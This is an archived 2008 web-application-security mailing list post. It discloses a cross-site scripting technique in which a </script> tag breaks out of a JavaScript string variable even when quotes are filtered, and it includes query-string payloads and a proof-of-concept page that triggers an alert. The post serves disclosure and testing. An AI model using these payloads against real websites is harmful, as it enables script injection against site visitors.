Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

webappsec logo WebApp Sec mailing list archives

Script Tag Breakout
From: "Nick Von Dadelszen" <nvondad () gmail com>
Date: Mon, 20 Oct 2008 14:34:25 +1300
ey all,

Not sure if this is a known issue or not but thought I would share.
Its not a common situation to occur but I've used it a couple of times
in the last couple of years while testing apps.

-- Description --
Able to break out of a string variable without using quotes through
the use of a </script> tag.

For example, if the code of a page does the following:
<script>
somestring = "[your querystring here]";
</script>

You would normally break out of this with the following
querystring=";[code here]

If the code checks for a double or single quote and removes it, you
cannot normally break out of this code.  However, you are able to
close the current script tag, even from within a string variable.  So,
the following two breakouts work:
querystring=</script>[HTML here]
querystring=</script><script>[javascript here]</script>

The resulting code looks something like the following:
<html>
<body>
<h1>Script Tag Breakout PoC</h1>
<script>
string = "</script><h1>Parsed HTML Code Here</h1><!--";
</script>
</body>
</html>

Or:
<html>
<body>
<h1>Script Tag Breakout PoC</h1>
<script>
string = "</script><script>alert(document.location);</script>";
</script>
</body>
</html>

In the above HTML, the javascript alert function is called regardless
of it being contained within a string variable.

-- Tested Browsers --
All version of IE and Firefox up to and including IE 7 and firefox 3.

---------------------------------------------------------
Nick von Dadelszen
Lateral Security
www.lateralsecurity.com
---------------------------------------------------------

-------------------------------------------------------------------------
Sponsored by: Watchfire 
Methodologies & Tools for Web Application Security Assessment 
With the rapid rise in the number and types of security threats, web application security assessments should be 
considered a crucial phase in the development of any web application. What methodology should be followed? What tools 
can accelerate the assessment process? Download this Whitepaper today! 

https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
-------------------------------------------------------------------------

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]